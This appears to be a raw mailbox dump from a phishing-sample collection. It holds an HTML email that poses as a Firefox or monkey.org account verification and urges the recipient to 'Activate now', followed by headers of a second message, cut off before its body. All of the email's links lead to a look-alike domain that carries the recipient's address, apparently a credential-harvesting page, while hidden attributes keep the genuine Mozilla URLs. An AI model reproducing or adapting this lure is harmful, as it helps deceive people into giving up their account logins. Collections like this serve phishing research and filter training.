From: "Mail Support" <jykoo@tekcivil.co.kr>
To: jose@monkey.org
Subject: Verify jose@monkey.org Account
X-TERRACE-DUMMYSUBJECT: Terrace Spam system                                  *
Date: 19 Feb 2019 09:14:52 -0800
Message-ID: <20190219091452.D0EB7A8528EC5C16@tekcivil.co.kr>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-TERRACE-SPAMMARK: NO       (SR:4.82)                     
  (by Terrace)                                                   
X-TERRACE-CLASSID: Terrace Spam system                                      
Status: O
X-Status: 
X-Keywords:                  
X-UID: 39

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19061"></HEAD>
<body style=3D"MARGIN: 0.5em">
<P>
<table style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif=
; WIDTH: 310px; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER-COLLAPSE: co=
llapse; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(34,34,34); FO=
NT-STYLE: normal; MARGIN: 0px auto; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: =
normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-=
ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0p=
x" cellspacing=3D"0" cellpadding=3D"0" width=3D"310" align=3D"center" borde=
r=3D"0">
<TBODY>
<TR style=3D"break-before: page">
<td id=3D"m_1741652788094750041gmail-x_firefox-logo" style=3D"FONT-FAMILY: =
Roboto, RobotoDraft, Helvetica, Arial, sans-serif; PADDING-BOTTOM: 20px; PA=
DDING-TOP: 20px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" align=
=3D"center"></TD></TR>
<TR style=3D"break-before: page">
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" valign=3D"top">
<H1 style=3D"FONT-SIZE: 21px; FONT-FAMILY: sans-serif; FONT-WEIGHT: normal;=
 TEXT-ALIGN: center; MARGIN: 0px 0px 11px; LINE-HEIGHT: 29px">Upgrade jose@=
monkey.org Account!</H1>
<P class=3Dm_1741652788094750041gmail-x_primary style=3D"FONT-SIZE: 14px; F=
ONT-FAMILY: sans-serif; FONT-WEIGHT: normal; TEXT-ALIGN: center; MARGIN: 0p=
x 0px 21px; LINE-HEIGHT: 21px">Please activate your account by confirming t=
his email address.</P></TD></TR>
<TR height=3D50>
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" valign=3D"top" align=3D"center">
<table id=3D"m_1741652788094750041gmail-x_email-button" style=3D"HEIGHT: 50=
px; WIDTH: 310px; BORDER-COLLAPSE: collapse; BACKGROUND-COLOR: rgb(10,132,2=
55); border-radius: 4px" height=3D"100%" cellspacing=3D"0" cellpadding=3D"0=
" width=3D"100%" border=3D"0">
<TBODY>
<TR style=3D"break-before: page">
<td id=3D"m_1741652788094750041gmail-x_button-content" style=3D"FONT-SIZE: =
20px; FONT-FAMILY: sans-serif; FONT-WEIGHT: normal; COLOR: rgb(255,255,255)=
; TEXT-ALIGN: center; MARGIN: 0px; LINE-HEIGHT: 20px" valign=3D"middle" ali=
gn=3D"center">
<A id=3Dm_1741652788094750041gmail-x_button-link style=3D"FONT-SIZE: 18px; =
TEXT-DECORATION: none; FONT-FAMILY: sans-serif; WIDTH: 280px; COLOR: rgb(25=
5,255,255); PADDING-BOTTOM: 15px; PADDING-TOP: 15px; PADDING-LEFT: 15px; DI=
SPLAY: block; LINE-HEIGHT: 26px; PADDING-RIGHT: 15px" href=3D"https://auuey=
ya.eu/english/index.php?email=3Djose@monkey.org" rel=3D"noopener noreferrer=
" target=3D_blank=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://accounts.fir=
efox.com/verify_email?uid%3D52c5e9961808442383bffcdf8f979bb3%26code%3D3791e=
431afbcd8d5d28ef62710a028c1%26utm_source%3Demail%26utm_medium%3Demail%26utm=
_campaign%3Dfx-welcome%26utm_content%3Dfx-activate&amp;source=3Dgmail&amp;u=
st=3D1550064591284000&amp;usg=3DAFQjCNFpDJAGDLvFIG7ymEIOnjUOXX9q5g">Activat=
e now</A></TD></TR></TBODY></TABLE></TD></TR>
<TR style=3D"break-before: page">
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" height=3D"100%" width=3D"100%" border=3D"0" cellpadding=3D"0=
" cellspacing=3D"0"><BR>
<P class=3Dm_1741652788094750041gmail-x_secondary style=3D"WORD-WRAP: break=
-word; FONT-SIZE: 11px; FONT-FAMILY: sans-serif; WIDTH: 310px; FONT-WEIGHT:=
 normal; COLOR: rgb(115,115,115); TEXT-ALIGN: center; MARGIN: 0px 0px 12px;=
 LINE-HEIGHT: 18px">This is an automated email; if you received it in error=
, no action is required. For more information, please visit<SPAN class=3DAp=
ple-converted-space>&nbsp;</SPAN>
<A style=3D"TEXT-DECORATION: none; FONT-FAMILY: sans-serif; COLOR: rgb(10,1=
32,255)" href=3D"https://auueyya.eu/english/index.php?email=3Djose@monkey.o=
rg" rel=3D"noopener noreferrer" target=3D_blank data-saferedirecturl=3D"htt=
ps://www.google.com/url?q=3Dhttps://support.mozilla.org/kb/im-having-proble=
ms-with-my-firefox-account?utm_source%3Demail%26utm_medium%3Demail%26utm_ca=
mpaign%3Dfx-welcome%26utm_content%3Dfx-support&amp;source=3Dgmail&amp;ust=
=3D1550064591284000&amp;usg=3DAFQjCNEFPcKvPcIuNHxCsCISR_nOGko64g">
monkey.org Support</A>.</P></TD></TR>
<TR style=3D"break-before: page">
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" valign=3D"top">
<P style=3D"WORD-WRAP: break-word; FONT-SIZE: 11px; FONT-FAMILY: sans-serif=
; WIDTH: 310px; FONT-WEIGHT: normal; COLOR: rgb(115,115,115); TEXT-ALIGN: c=
enter; MARGIN: 0px; LINE-HEIGHT: 18px">mail service 2019<SPAN class=3DApple=
-converted-space>&nbsp;</SPAN><BR>
<A style=3D"FONT-SIZE: 11px; TEXT-DECORATION: none; FONT-FAMILY: sans-serif=
; COLOR: rgb(10,132,255); LINE-HEIGHT: 18px" href=3D"https://auueyya.eu/eng=
lish/index.php?email=3Djose@monkey.org" rel=3D"noopener noreferrer" target=
=3D_blank data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://ww=
w.mozilla.org/privacy?utm_source%3Demail%26utm_medium%3Demail%26utm_campaig=
n%3Dfx-welcome%26utm_content%3Dfx-privacy&amp;source=3Dgmail&amp;ust=3D1550=
064591284000&amp;usg=3DAFQjCNH5RW3VNYMTMcrBINFmXQvnmlrDzA">
monkey.org Privacy Policy</A></P></TD></TR></TBODY></TABLE></P></BODY></HTM=
L>



From jose@monkey.org Tue Feb 19 18:36:58 2019 +0000
Return-Path: de-ann.hughes@stcg.ac.uk
Delivered-To: jose@monkey.org
X-FDA: 75183221316.02.tree22_3cc901dc1dd3b
X-Spam-Summary: 50,0,0,54866669bf135373,d41d8cd98f00b204,de-ann.hughes@stcg.ac.uk,:de-ann.hughes@stcg.ac.uk,RULES_HIT:2:10:41:72:327:355:379:444:582:599:677:871:960:962:966:967:973:983:988:989:994:1000:1152:1189:1208:1260:1313:1314:1345:1359:1381:1390:1431:1432:1436:1437:1516:1517:1518:1573:1575:1588:1589:1592:1594:1730:1744:1764:1776:1792:1823:2196:2198:2199:2200:2525:2527:2528:2539:2553:2557:2568:2610:2633:2682:2685:2859:2892:2894:2901:2903:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3154:3353:3586:3769:3865:3866:3867:3868:3870:3871:3872:3873:3874:3892:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4050:4321:4361:4385:4503:4505:4700:4860:6248:6261:6353:6354:6506:6653:6658:6678:6688:6703:6747:6748:7281:7398:7652:7903:7904:7909:8568:8603:8858:8957:9025:9080:9121:9149:9390:9908:10004:10205:10265:10346:10394:10522:11233:11604:11656:11657:11658:11788:11875:11914:12043:12291:12324:12438:12519:12521:12555:12660:12679:12683:12895:12903:12986:13005:13017:13
X-HE-Tag: tree22_3cc901dc1dd3b
X-Filterd-Recvd-Size: 33568
Received: from mail1.bemta25.messagelabs.com (mail1.bemta25.messagelabs.com [195.245.230.132])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 19 Feb 2019 18:36:57 +0000 (UTC)
Return-Path: <De-Ann.Hughes@stcg.ac.uk>
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=stcg.ac.uk;
	s=default; t=1550601413; i=@stcg.ac.uk;
	bh=dIxaYvljPSPdeHFvNPLjrvrtWpiDyLNnRoyLoRmbucY=;
	h=From:To:Subject:Date:Message-ID:References:In-Reply-To:
	 Content-Type:MIME-Version;
	b=vPLLpeuVgmYhgmNngtWv3a69WPr0j/9NWhG2qnfAsWcJkN4yMtUvTuxQSvlPUj2dV
	 DnhpRLST7M1tJosfTf/lk3qGzNoinHYyJDKGTA9TAC9Be8ok2zieoe31s7i5AqTbXM
	 +aQLFIF3tT4gw5xfSO7tlULSjP81hLZZGINyppdMtAxCqL3nyFgI9ZM3FGPU9eV2cA
	 tc7KkwA3EzWyH0N/iTyrHTU0X9RYBs53vPaOifAx4S8JSZ8NcUltNEd9VZsxOz5peS
	 4OtVqk3SAunLB5Doxhxjy93AuknSqzIes4Dch71eBgRxxEi2yf3HkAiW4LNAf2nwdS
	 2mhBhI7cquoeQ==
Received: from [46.226.53.57] (using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384 (256 bits))
	by server-4.bemta.az-c.eu-west-1.aws.symcld.net id DB/AC-22588-85C4C6C5; Tue, 19 Feb 2019 18:35:04 +0000
X-Brightmail-Tracker: H4sIAAAAAAAAA2WUa0xTZxjHfc+lpyJdKkJ8B3OZKMsutgOWucc
  tGSa7HUUTL8nmNhdWtYNupSKtEfgE4kRFUbSktFCkWApl6rDC7FCuarE6JwWm5eIQKDIB42Ry
  FWGnHHAaP5wnv/e5/f/v+fAKST/DvEChPEEjj1fJlMECH6q5LWKt5Ms1ys2hhY5AaO430TBUs
  ZeC7ow+BM79AyTcyhhloNmWTYPt6hgNTQ4LBbmVeQy0JZsRdDdPIajUegiov5ZDw2jFQQZGrJ
  0EGOtuIHioS0Fwqv0yAbdNGQIoP9WIoOmWgQHnWRGk/roMukw3EaRVtTPwk7NSADcnnlAwpV0
  LRYO+cCl1goC8h0coKEl30NCTe5AEl0FLg27URUFBmhFBddYmeLLPJgCzO5WC1tJaAiy9m6Bl
  uJ4G8+NqCtpLMxE8biumQT+hRVA63EPDnuRaCvZVxsKDsjwKDOePErC30UVDsnYpFLQfZsCdy
  u25UWknwWKWQO7Bb8CR8y+CI49SGCizHKPh9NE9BJwzHSPg96lJaqWVYOstmTSb0+dBbFNzJF
  tsHSfZE7+UMWxO5QDBVt0wMqz+cBPXduc6zfbcN1JsVVcVyXactzKssaELsccG82l2d0Uaw9r
  +7kfrBtHXtEK1ZXvCd3RMmW6ciLvdhhK0f/xJJKM7DegA8hH6ia0I95+w0PzBg/BAy33yAJrL
  HdIRPtsd62WBWIpbz40QXvYXL8N38xuneYF4EZ66Z6f4/Kt4ZOLiTE84tpvzBV6mxCF46J8WL
  i8UisQrcProal4rC+ETHe5prbniD7D70BjjZcTt7LKOTzMpXohbPcend2KxP+50XRPwHIDvdU
  /SPC/GpjuzPcvxhNVF87NfYbejfHqPSDwfO/Ueir9XCC65eIE+ggIMz0gYnhkxPDPC55Owx65
  DBu4KpDgKFxSG8GkpdmdpBTy/jS2mfpJnCc6erKNezG/AP7ubZvgzXDdeT/N8BeGS7FU8R+C8
  giKG58VYm97J8LLrsbkliE9/ilMP9XDrfTiuR1hXkzXj4SPsGn5MPT/r5Y34esPYjO7nePDBy
  Zl+J8L2opm7rMS9e46iF3U34OriFbOWM5+UCnhdzrKjfB8167n8UbvgRV3AbouJmv0nKQcKCX
  74LMJDNj2ZjxaXINgSr4iO0cTKFEpJWGioJCwsXBIe6v1CpbIkyVapfKdkl1ytkYRJZbvUUnV
  i7FblNqlKrrEh7t3ZFnf1ih3lFkfXoZeFRHCAKPtN5Wa/l7Zs35YYI1PHRMXvVMrVdegVoTAY
  i0pXc7X58fJoecL3CiX3eM2WsdA32F/0wFsWqeNksWpFNF+6ir4V1hR0GklhW603Oke8scLSx
  cWMM3e5mN3hjWXTsWI63q/tNZJ+lGq7Sh64UFSyilsq9i6N2al6Kjn7ZDaiRYELRGjOnDl+vn
  Hy+FiF5vl6H1ooRMELRE6vNV+FSvPUWR9nmuBMG6Z+9JrWyP4vBSajPk/JKv3qj33gzJKIXv1
  frwUN5XxYs2bsdNAnHdFLzf6tmfszys8td0W1mydP75iflCjThzhs47suDS9pSJNT6yNTLrzf
  GbW/cDSoJjLR1jvPb67p0u53w32yxiuKfqCSkjsDfqu2H5p49PpI5I7LbxQ71xW9p1uzXnd8q
  OOLdyJxxMmBYEodIwt7i4xXy/4DV/KLfS0GAAA=
X-Env-Sender: De-Ann.Hughes@stcg.ac.uk
X-Msg-Ref: server-7.tower-309.messagelabs.com!1550601302!1657806!1
X-Originating-IP: [212.219.63.77]
X-SYMC-ESS-Client-Auth: outbound-route-from=pass
X-StarScan-Received:
X-StarScan-Version: 9.31.5; banners=-,-,-
X-VirusChecked: Checked
Received: (qmail 22437 invoked from network); 19 Feb 2019 18:35:03 -0000
Received: from autodiscover.stcg.ac.uk (HELO smtp.stcg.ac.uk) (212.219.63.77)
  by server-7.tower-309.messagelabs.com with AES256-GCM-SHA384 encrypted SMTP; 19 Feb 2019 18:35:03 -0000
Received: from KCGMAIL02.KCNET.LOCAL (172.16.0.6) by KCMail05.KCNET.LOCAL
 (172.16.0.40) with Microsoft SMTP Server (TLS) id 14.3.408.0; Tue, 19 Feb
 2019 18:35:02 +0000
Received: from KCGMAIL02.KCNET.LOCAL (172.16.0.6) by KCGMAIL02.KCNET.LOCAL
 (172.16.0.6) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256) id 15.1.1415.2; Tue, 19 Feb
 2019 18:35:02 +0000
Received: from KCGMAIL02.KCNET.LOCAL ([::1]) by KCGMAIL02.KCNET.LOCAL ([::1])
 with mapi id 15.01.1415.007; Tue, 19 Feb 2019 18:35:02 +0000
